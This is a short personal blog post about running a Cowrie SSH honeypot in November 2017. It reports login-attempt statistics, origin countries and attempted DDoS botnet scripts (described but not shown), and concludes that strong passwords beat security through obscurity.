The Honeypot Project

The protection of information is crucial. However, protecting information is not easy. Recently, Uber disclosed that hackers accessed personal information of 57 million riders and drivers last year, and Equifax admitted that 145.5 million names, social security numbers, addresses and driver's license numbers were extracted from their website.

I set up a honeypot to see what successful attacker does once in a system; my focus was not on preventing breaches. I chose the honeypot Cowrie, an extension of the popular SSH honeypot Kippo. I picked Cowrie for two reasons: its simplicity and its effectiveness. I predicted that an SSH server would more likely get more traffic from bots and hackers than a web server or database. Here is what I found:

I was attacked quickly. I spun up the server on November 22, 2017, at 9:30 p.m. The first unauthorized login attempt was at 4:01 a.m. the next morning. Less than eight hours after starting my server, I was already attacked.

I also received many login attempts in a short amount of time. Thus far, I’ve received 49,770 login attempts using 1,191 different passwords. Some of the bots where more persistent than others, trying hundreds of password combinations with a variety of different usernames. You can view the username frequency for all login attempts (as of November 30, 2017) here. You can view the password frequency for all login attempts (as of November 30, 2017) here.

I found three different scripts that attackers tried to run on my system. All of them where written in perl and followed the same basic pattern:


I was able to recover two scripts. The two I recovered were DDoS botnet scripts. The attackers’ neglect in covering their tracks surprised me. Though they delete the scripts, the commands were easily viewable in any logging software. In addition, there was 16,588 attempts to create a direct TCP connection to my server (although most were carried out by a few bots).

The attacks ranged around the world. The top five origin country for the traffic is:

  1. Russia (32,549)
  2. France (3,525)
  3. China (1,713)
  4. Brazil (764)
  5. Greece or Italy* (307 - 1,122)
    *the exact country couldn't be specified

These locations are likely inaccurate, as attackers usually hide their orgin. Nevertheless, this data provides insight into where it is safe to launch attacks.

I am taking away two things from this project. The first is security from obscurity is wrong. The amount of attacks on an SSH server without a domain name went far above my expectations. The second is the best security comes from smart users. Strong passwords and non-default usernames would have protected the server from every attack.


comments powered by Disqus